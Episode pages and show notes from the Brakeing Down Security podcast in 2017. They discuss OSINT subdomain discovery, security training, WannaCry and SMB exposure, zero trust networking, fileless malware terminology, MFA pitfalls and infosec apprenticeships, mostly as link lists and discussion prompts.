Hector Monsegur (@hxmonsegur on Twitter) is a good friend of the show, and we invited him to come on and discuss some of the #OSINT research he's doing to identify servers without using noisy techniques like DNS brute forcing.
We also discuss EclinicalWorks and their massive fine for falsifying testing of their EHR system, and implications for that. What happens to customers confidence in the product, and what happens if you're already a customer and realize you were duped by them?
We also discuss Hector's involvement with the TV show "Outlaw Tech". Who approached him, why he did it, why it's not CSI:Cyber or "Scorpion" and how it discusses the techniques used by bad guys.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-020-Hector_monsegur_DNS_research_OSINT.mp3
#RSS: www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
----------
Show notes:
going beyond DNS bruteforcing and passively discovering assets from public datasets???
Very interested in hearing about this
Straight OSINT, or what?
Hxm: Over at RSL (Rhino Sec Labs), one of the research projects I’m working on is discovery of assets (subdomains) while minimizing footprint (dns bruteforcing). Datasets include things like:
- Data from the certificate transparency project (https://www.certificate-transparency.org/)
- rDNS and forward dns dataset from https://scans.io/ Sonar Scans - Rapid7
- Sublist3r: https://github.com/aboul3la/Sublist3r
- And other datasets that are out there
-
- Crime Flare https://krebsonsecurity.com/tag/crimeflare-com/ -> crimeflare.com
- Discuss why brute forcing DNS leaves such a heavy footprint for blue team forensics
- How cloud providers like CloudFlare, and others, do not take advantage of DNS bruteforcing error messages
-
- Special shout out to Ryan Sears @ CaliDog Security for his research into this field
- https://en.wikipedia.org/wiki/Markov_chain
- Smart DNS Bruteforcing - https://github.com/jfrancois/SDBF
Training gained from internal phishing campaigns
Does it breed internal mis-trust?
Recent campaign findings
Why do it if we know one account is all it takes? Because we know it’s a ‘win’ for security?
Outlaw Tech on Science Channel
What’s it about? (let’s talk about the show)
- The show itself is on the Science channel (Discovery)
- The aim of the program is to discuss the technology behind many of the biggest crimes (heists, el chapo’s communication network, etc)
- And how I play a part in it
- https://www.spoofcard.com/
- https://www.sciencechannel.com/tv-shows/outlaw-tech/
- Rhinosecuritylabs.com
http://www.dw.com/en/estonia-buoys-cyber-security-with-worlds-first-data-embassy/a-39168011 - ”Estonia buoys cyber security with world's first data embassy” - interesting
https://www.digitalcommerce360.com/2017/05/31/eclinicalworks-will-pay-feds-155-million-settle-false-claims-charges/ -- holy shit
-- Reminds me of the whole emissions scandal from a couple of years back. http://www.roadandtrack.com/new-cars/car-technology/a29293/vehicle-emissions-testing-scandal-cheating/
http://securewv.com/cfp.html
OneLogin/Docusign breaches
OneLogin: https://arstechnica.com/security/2017/06/onelogin-data-breach-compromised-decrypted/
Docusign: https://www.inc.com/sonya-mann/docusign-hacked-emails.html
http://www.spamfighter.com/News-20916-DocuSign-Data-Hack-Resulted-in-Malware-Ridden-Spam.htm
Crowdfunding to buy shadowbroker exploits ended: https://threatpost.com/crowdfunding-effort-to-buy-shadowbrokers-exploits-shuts-down/126010/
China's Cybersecurity Law: https://lawfareblog.com/chinas-cybersecurity-law-takes-effect-what-expect
Facial recognition for plane boarding: http://money.cnn.com/2017/05/31/technology/jetblue-facial-recognition/index.html
Keybase.io’s Chrome plugin -- Game changer? https://chrome.google.com/webstore/detail/easy-keybaseio-encryption/bhoocemedffiopognacolpjbnpncdegk/related?hl=en
Published on: June 14, 20172017-019-Ms. Jessy Irwin, Effective Training in Small/Medium Businesses
This week, we invited Ms. Jessy Irwin (@jessysaurusrex) on to discuss the issues Small and medium businesses and startups have with getting good training, training that is effective and what can be done to address these issues.
We also go through several ideas for training subjects that should be addressed by training, and what maybe would be addressed by policy.
-------
Upcoming BrakeSec Podcast training:
Ms. Sunny Wear - Web App Security/OWASP
14 June - 21 June - 28 June at 1900 Eastern (1600 Pacific, 2300 UTC)
$20 USD on Patreon to attend the class
$9 USD for just the videos to follow along in class
Patreon: https://www.patreon.com/bds_podcast
If you want the videos and don’t care about the class, they will be released a week after class is over for free.
--------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat 2017
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Show Notes:
I don’t trust articles written with a survey created by a company that is touting their new education track at the bottom of the article. -- brbr
https://twitter.com/jessysaurusrex/status/859123589123121152
“So sick of the tired narrative that sec awareness is just about phishing when there are ~10 basic skills we need to be educating people on”
What are the ~10 things?
First off, most corporate security training misses the incentive mark by a mile. If training were refocused in a way that showed the incentives to improving personal safety, we might get somewhere. Teaching people how to take care of themselves first works-- those habits carry over into their work life, not usually the other way around.
- Passwords
- Multifactor authentication
- Device encryption
- Ad blocking
- Browser hardening via extension/plugin
- Safe browsing (this breaks into a few different topics)
- Phishing doesn't just happen via email anymore: social media inboxes, text message inboxes, messaging apps, etc.
- Most users won't come to social engineering defenses on their own-- important to educate and give alternatives that encourage them to confirm information out of band or navigate to a site in their browser
- Social engineering (this breaks into a few different topics)
- Segmentation/compartmentalizing data + communications
- Secure storage(local vs cloud data)
- Media storage safety (thumbdrives! Charge-only cables for mobile devices!)
- Google Apps + Slack allow for OAuth; most people set it and forget it, don't review what apps can act on their behalf until it's too late
- Regularly reviewing permissions granted to apps through oAuth
- Backups
“The report goes onto say that security awareness professionals with more technical backgrounds are more keen to recognizing behaviors that might bring risk, however, at times communications training is critical given that human interaction soft skills make changing risky employee behavior. They know what behaviors are the most effective in managing those risks. Often however, the challenge is that these same individuals often lack the skills or training to effectively communicate those risks and engage employees in a manner that effectively changes behavior.” summed up our entire industry in this paragraph --brbr
https://securingthehuman.sans.org/resources/security-awareness-report-2017
^^^^ saw this on Twitter yesterday -brbr
Key takeaways:
The study recommends the following for addressing communications:
- Communicate to leadership monthly about your security awareness program -- in a way that business leaders will value.
- Find a strong champion within leadership, and ask them to help relay the program value to other leaders, or assist with message crafting.
- Partner with those in the org that you've found to appreciate and adhere to security awareness inputs, especially those who can help partner on better communications.
- Take communications training; they can be easily developed with the right focus.
- Align with human resources to ensure an awareness program is tied into company culture.
- Keep an eye on your audience, as it grows and shift, and recognize that the same message that works for developers may not be effective for marketing, and vice versa. A one-size-fits-all communications approach can be limiting.
You writing a book?
I've been working on a book about security that's focused on education and communication. We do such a horrible job at this-- we don't do very much that helps the average person or our non-technical, non-expert colleagues have a chance at being successful online. Our terms are too technical, our framing is unbelievably negative and toxic, and the lack of empathy for the people at the other end of the computer is absolutely astounding. It is entirely fixable, but we all have to stop contradicting one another and really start working together. :)
You make it sound so bleak and self-destructive :|
I would like to hope that we can get better.
Oh yea, the echo chamber, “who has the right answer?” no one, we all just have pieces...
Yes! And sometimes the right answer changes very, very quickly! It's less about the silver bullet answer and more about what we’re defending from and hoping to accomplish.
Are SMBs the issue?
Are they more insecure than bigger companies?
Or do bigger companies get more media coverage?
Are bigger companies any better at training employees?
Or are they better at ‘checking’ the box?
If we take the statement ‘paid for security training sucks’ as a given, what do we do about it?
What trainings should we be giving?
And what training should actually be policy driven? (make it a requirement to follow)
Clean desk
Password manager
Coding practices
Acceptable use
Device encyption
2FA/MFA
What training do infosec people need? How important are the soft skills to help with communicating?
Published on: June 6, 20172017-018-SANS_course-EternalBlue_and_Samba_vulnerabilities-DerbyCon contest details
We discuss SANS courses, including the one I just took (SEC504). How did I do in class? You can listen to the show and find out.
Since it's been a few weeks, we also discuss all the interesting WannaCry reports, the ease at which this vulnerability was exploited, and why would a company allow access to SMB (tcp port 445) from the Internet?
We discuss some upcoming training that we are holding starting 14 June. Ms. Sunny Wear will be doing 3 sessions discussing the use of Burp, and showing how to exploit various web application vulnerabilities. Details are in the show notes and in our Slack Channel.
Ms. Sunny Wear is doing a web app security class
Starts June 14th at 1900 Eastern (1600 Pacific, 2300 UTC)
Sign up for the class at the $20 dollar Patreon level (if you plan on attending)
Sign up for immediate video access at the $10 Patreon level (cannot attend class, but want to follow along)
Everyone will have access to the Slack Channel to follow along with the class, ask questions, etc (join our #slack channel for more information)
https://www.patreon.com/bds_podcast
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-018-SANS_course-EternalBlue-Samba-DerbyCon.mp3
RSS: www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
--------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat 2017
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
SHOW NOTES:
SANS experience
Pity Quincenera - I (bryan) sucked
Need more experience
Speed kills (I (bryan) got flustered and I shutdown) you took speed?
No Kali - was surprised, until I thought of why :D
Was not helpful to my team (jacek, ryan, Michael C., David)
John Strand was phenomenal
Frank Kim was great
The audio was not, unfortunately :(
Samba/SMB (port 445) vulns
Use case for having it exposed?
**** OPEN TO SUGGESTIONS *****
What does that say about the company?
No security team, or the security team is ineffectual about telling people about the risks?
What
MS17-010 is the new MS08-067
http://thehackernews.com/2017/05/samba-rce-exploit.html
Over 400,000 open to the web
https://en.wikipedia.org/wiki/WannaCry_ransomware_attack
Training announcement:
Ms. Sunny Wear doing a web app security class
Starts June 14th
Sign up for the class at the $20 dollar Patreon level
Sign up for immediate video access at the $10 Patreon level
https://www.patreon.com/bds_podcast
Who’s Slide is it Anyways? @ImprovHacker
#infosec #podcast #webAppSec #application #security
Published on: May 30, 20172017-017-Zero_Trust_Networking_With_Doug_Barth,_and_Evan_Gilman
Zero trust networking may be a foreign concept to you, but Google and others have been utilizing this method of infrastructure and networking for quite a while now. It stands more traditional networking on it's head by not having a boundry in the traditional sense. There's no VPN, no ACLs to audit, no firewall to maintain... Sounds crazy right?
Well, it's all about trust, or the lack of it. No one trusts anyone without a proper chain of permission. Utilizing 2FA, concepts of port knocking, and CA certificates are used to properly vet both the host and the server and are used to keep the whole system safe and as secure as possible.
Sounds great right? Well, and you can imagine, with our interview this week, we find out that it's not prefect, people have to implement their own Zero Trust Networking solution, and unless you are a mature organization, with things like complete asset management, data flow, and configuration management, you aren't ready to implement it.
Join us as we discuss Zero Trust Networking with Doug Barth (@dougbarth), and Evan Gilman (@evan2645)
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-017-Zero_Trust_Networks.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
---------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat 2017
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
show notes:
The lines are blurring:
DevOps
NetOps
SDN
SDP
docker/containerization
2FA authentication
https://devcentral.f5.com/articles/load-balancing-versus-application-routing-26129
All good points, except no one wants to do the needful bits (ID’ing information, data flow, proper network design)
https://en.wikipedia.org/wiki/Software_Defined_Perimeter
Where is this Google article???
http://www.tomsitpro.com/articles/google-zerotrust-network-own-cloud,1-2608.html
https://cloud.google.com/beyondcorp/
https://www.theregister.co.uk/2016/04/06/googles_beyondcorp_security_policy/
Who benefits from this? Network engineers, apparently… :)
Devs?
IT?
Sounds like a security nightmare… who would get the blame for it failing
How do we keep users from screwing up the security model? Putting certs on their personal boxes?
Prior BrakeSec shows: Software Defined Perimeter with Jason Garbis
http://traffic.libsyn.com/brakeingsecurity/2017-011-Software_Defined_Perimeter.mp3
http://shop.oreilly.com/product/0636920052265.do
Doug Barth Twitter: @dougbarth
Evan Gilman Twitter: @evan2645
Runs counter, right? We are used to not trusting the client…
A Mature company can only implement
Device inventory
Config management
Data flow
Asset management
Micro-services?
Brownfield networks
Sidecar model -
Certain OSes not possible
Published on: May 9, 20172017-016-Fileless_Malware, and reclassifying malware to suit your needs
Malware is big business, both from the people using it, to the people who sell companies blinky boxes to companies saying that they scare off bad guys.
The latest marketdroid speak appears to be the term 'fileless malware', which by definition...
FTA: “Malware from a "fileless" attack is so-called because it resides solely in memory, with commands delivered directly from the internet. The approach means that there's no executable on disk and no artefacts ("files") for conventional computer forensic analysis to pick up, rendering the attacks stealthy, if not invisible. Malware infections will still generate potential suspicious network traffic.”
https://www.theregister.co.uk/2017/04/28/fileless_malware_menace/ -- by definition, not ‘fileless’
But many of the 'fileless' attacks require a 'file' to be opened to enable the initial infection.
This week, Michael Gough (@hackerhurricane) comes on to discuss his latest blog post (http://hackerhurricane.blogspot.com/2017/05/fileless-malware-not-so-fast-lets.html) and we discuss the fact that a lot of malware classification and categorization and how it fails to actually convey to leaders what it affects
https://business.kaspersky.com/targeted-attacks-trends/6776/
http://www.binarydefense.com/powershell-injection-diskless-persistence-bypass-techniques/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-016-fileless_malware_reclassifying_malware_types.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Bsides Springfield, MO Eventbrite for Tickets: https://www.eventbrite.com/e/bsides-springfield-tickets-33495265240 (only 27 tickets left as of 28 Apr)
---------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat 2017
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: May 2, 20172017-015-Being a 'security expert' vs. 'security aware'
This week, we have a little story time. Developers should be aware of the kinds of vulnerabilities their code can be attacked with. XSS, Buffer overflows, heap overflows, etc should be terms that they understand. But is it enough that they are 'aware' of them, and yet seem to do nothing? Or should they be experts in their own particular area of development, and leave infosec people to deal with more generic issues?
We discuss the pros and cons of this argument this week, as well as how the idea of training people are flawed, because of who holds the purse strings.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-015-security_expert-vs-Security_aware_devs.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Bsides Springfield, MO Eventbrite for Tickets: https://www.eventbrite.com/e/bsides-springfield-tickets-33495265240 (only 27 tickets left as of 28 Apr)
---------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat 2017
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: April 27, 20172017-014-Policy_writing_for_the_masses-master_fingerprints_and_shadowbrokers
So, I (Bryan) had a bit of a work issue to discuss. It has become one of my myriad jobs at work to write up some policies. In and of itself, it's not particularly fun work, and for whatever reason, this is causing me all kinds of issues. So this week we take a quick look at why I'm having these issues, if they are because I don't get it, or because the method I must follow is flawed.
After that, we add on to last week's show on #2FA and #MFA (http://traffic.libsyn.com/brakeingsecurity/2017-013-Multi-factor_auth_gotchas_with_Matt.mp3) by discussing why scientists are trying to create a 'master fingerprint' capable of opening mobile devices. We talk about FAR and FRR (false acceptance/rejection rates), and why the scientists may actually be able to pull it off.
We discussed Ms. Berlin's trip to the AIDE conference (https://appyide.org/), a two day #DFIR conference held at Marshall University by our good friend Bill Gardner (@oncee on Twitter). She gave a great interactive talk on working through online wargames and CTFs, and we get her update on the conference.
Finally, we did discuss a bit about the #ShadowBroker dump of #NSA tools. We discussed how different people are taking this dump over the #Wikileaks #CIA dump.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-014-Policy_writing_for_the_masses-master_fingerprints_disneyland.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
---------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat 2017
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
--- show notes----
Discuss AIDE with Ms. Berlin
Log-MD.com posted their first video.
Fingerprint Masters (a case against biometrics):
http://www.digitaltrends.com/cool-tech/master-prints-unlock-phones/
Encrypted comms causing issues for employers: https://iapp.org/news/a/employers-facing-privacy-issues-with-encrypted-messaging-apps/
ShadowBrokers dump
“Worst since Snowden”
https://theintercept.com/2017/04/14/leaked-nsa-malware-threatens-windows-users-around-the-world/
Making policies, easier said than done
Discuss DefSec chapter on Policies
Difficulty: aligning policies with compliance standards
FedRamp, PCI, etc
Writing a good policy so that it follows the guidelines
http://shop.oreilly.com/product/0636920051671.do -- Defensive Security Handbook
Published on: April 20, 20172017-013-Multi-factor Auth implementations, gotchas, and solutions with Matt
Most everyone uses some kind of Multi-factor or '2 Factor Authentication". But our guest this week (who is going by "Matt" @infosec_meme)... Wanted to discuss some gotchas with regard to 2FA or MFA, the issues that come from over-reliance on 2FA, including some who believe it's the best thing ever, and we finally discuss other methods of 2FA that don't just require a PIN from a mobile device or token.
We also discuss it's use with concepts like "beyondCorp", which is google's concept of "Software Defined Perimeter" that we talked about a few weeks ago with @jasonGarbis (http://traffic.libsyn.com/brakeingsecurity/2017-011-Software_Defined_Perimeter.mp3)
This is a great discussion for people looking to implement 2FA at their organization, or need ammunition if your boss thinks that all security is solved by using Google Auth.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-013-Multi-factor_auth_gotchas_with_Matt.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
---------
Jay Beale’s Class “aikido on the command line: hardening and containment”
JULY 22-23 & JULY 24-25 AT BlackHat 2017
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Show Notes:
What does MFA try to solve:
- Mitigate password reuse
- Cred theft - Someone stealing credentials from embarassingadultsite.com and turns they work out on a totallyserious.gov RDP server
- Phishing bad - same as above, except now you convince someone totallyseriousgov.com is legit and they give you credentials
Cred theft:
- Getting to the point where old mate literally has more password dumps than time
- https://www.troyhunt.com/i-just-added-another-140-data-breaches-to-have-i-been-pwned/
- Honestly not going away, and combined with password reuse makes things pretty bad
Phishing:
- Happens.
- META: do we need to back this up with some stats? https://blog.barkly.com/phishing-statistics-2016
MFA / Bad things happening with that:
- AU Telecommunications provider sent multifactor SMS to wrong people
- RSA was owned years ago - and had to reissue a bunch of tokens
-
- http://money.cnn.com/2011/06/08/technology/securid_hack/
- https://bits.blogs.nytimes.com/2011/04/02/the-rsa-hack-how-they-did-it/?_r=0
- On the plus side, obviously increased cost to attacker significantly to do that
- Phishing frameworks are everywhere
-
- Misc / Turns out U2F makes phishing kind of dead? (Read first amendment)
- https://breakdev.org/evilginx-advanced-phishing-with-two-factor-authentication-bypass/
- Appears Backed up by the spec ( ‘Origin’ / https://fidoalliance.org/specs/fido-u2f-v1.1-id-20160915/fido-u2f-overview-v1.1-id-20160915.pdf)
Phishing/2FA/Solutions?
- a) What does multifactor actually solve?
- b) Are we (infosec industry) issuing multifactor solutions to people just so people make money?
- c) Do these things give a *false* sense of security?
- d) What do you think about storing the token on the same box? Especially given an actor on the box is just going to steal creds as they’re entered.
Internal training / is this actually working?
Australia Post didn't think so
https://www.itnews.com.au/news/why-australia-post-ransomwared-its-own-staff-454987
Counterpoints:
It's irritating and does break at times ( https://twitter.com/dguido/status/842448889697447938 )
C: I don’t like running some silly app on my phone
C: I also don’t like running around with a physical token
C: Embedding a Yubico nano in my usb slot leaves me with one usb port left
Also doesn’t solve when someone just steals that token
Does any of it matter:
Beyondcorp / "Lets make the machines state be part of the credential"
https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43231.pdf
- Tl;dr of paper: TPMs, certificates and a lot of health checks - think of NAC on steroids
Is there some way we (not google) can make it so a credential is worthless?
Solutions:
Duo / “There's an app on my phone and it has context about what wants to do something right now”
Probably a step in the right direction
Kind of like some Aus banks which SMS you before transferring $X to Y account
Okta - (grab links to spec)
META // Does this actually solve it?
OAUTH - (grab links to spec)
Attacking OAUTH - https://dhavalkapil.com/blogs/Attacking-the-OAuth-Protocol/
META // It’s not MFA, but it makes the cost of unrelated compromise significantly lower
META // Engineering things to short lived secrets is a better idea
I think one of the better ideas being put out was by google in 2014, the ‘beyondcorp’ project (https://research.google.com/pubs/pub43231.html), simply put:
- The devices used everywhere are chromebooks run in standard mode rather than developer mode
-
- (Whitelisting For Free™)
- Everything is a web app
- Everything else can’t run due to app whitelisting built-in
- The device needs to also authenticate before the user can do anything, and is used as part of the judgement for access control engines
- Everything cares about the machine the user is using - It’s part of the credential
- Passwords are no longer important and it’s all single sign on
-
- Suddenly credential theft doesn’t matter
- The device uses certificates to attest to its current state, so stolen passwords without a valid device don’t matter
- As the device is a glorified web browser, and has app whitelisting, you’re not going to get code execution on it, malware no longer matters
-
- Caveat, someone will probably think of some cool technique and that’ll ruin everything
- See: Problem of induction / “Black swan event”
Obviously this is a massive undertaking and would require massive overhaul of everything, but it did look like Google were able to pull it off in the end. (https://research.google.com/pubs/pub44860.html).
Tavis is banging on LastPass again… https://www.ghacks.net/2017/03/21/full-last-pass-4-1-42-exploit-discovered/
Duo Security // Beyondcorp
https://duo.com/blog/beyondcorp-for-the-rest-of-us
More info on Beyondcorp
Misc// Hey google wrote a paper on U2F a while back
http://fc16.ifca.ai/preproceedings/25_Lang.pdf
Touched on briefly / “Secure Boot Stack and Machine Identity” at Google - Servers which need to boot up into a given state (Sounds like U/EFI except ‘ Google-designed security chip’)
https://cloud.google.com/security/security-design/resources/google_infrastructure_whitepaper_fa.pdf
META // Patrick Gray (sic) interviewed Duo last week and talked about the same thing
Published on: April 13, 20172017-012-UK Gov Apprenticeship infosec programs with Liam Graves
One of our Slackers (people who hang with us on our Slack Channel) mentioned that he was writing exam materials for one of the programs created by the UK Government to train high school and/or people headed to university in skills without the traditional 4 year education track.
I was very intrigued by this, since we don't appear to have anything like this, outside of interning at a company, which means you're not considered a full-time employee, have no benefits, and there's no oversight about what you are learning. (Your mileage may vary)
So we asked Liam Graves (@tunnytraffic) to come on and discuss his experience, and how he was enjoying it. We discuss various methods of alternative educations here and in the UK, as well as why someone should possibly consider an apprenticeship. We also discuss how that would work in the US (or could it?)
Also, I very sorry Ireland ... :) I did not mean to lump you in the rest of the Commonwealth...
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-012-UK_Gov_apprenticeships_with_Liam_Graves.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
-----
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
--
Show Notes:
UK apprenticeship schemes:
long established though a recent focus shift back from academic achievement to hands-on skills and understanding/applying more than just remembering.
End Point Assessment - project based final assessment.
A mix of targeted learning and on-the-job experience working towards a brief: https://www.thetechpartnership.com/globalassets/pdfs/apprenticeship-standards/cyber-intrusion-analysis/occupational-brief-cyber-intrusion-analyst.pdf
Boring - but some background reading. Apprentices at this level will use levels 1-3 of Bloom’s taxonomy (https://en.wikipedia.org/wiki/Bloom's_taxonomy) 1) Remembering (What type questions). 2) Understanding (Which of these/Why type questions) 3) Applying (It this then what scenarios and questions)
Other schemes include (new and existing):
- Cyber Intrusion Analysts
- Cyber Security Technologists
- Data Analysts
- Digital Marketers
- Infrastructure Technicians
- IT Technical Salesperson
- Network Engineers
- Software Developers
- Software Development Technicians
- Software Testers
- Unified Communications Trouble-shooters (no idea what these ones are)
- Unified Communications Technicians
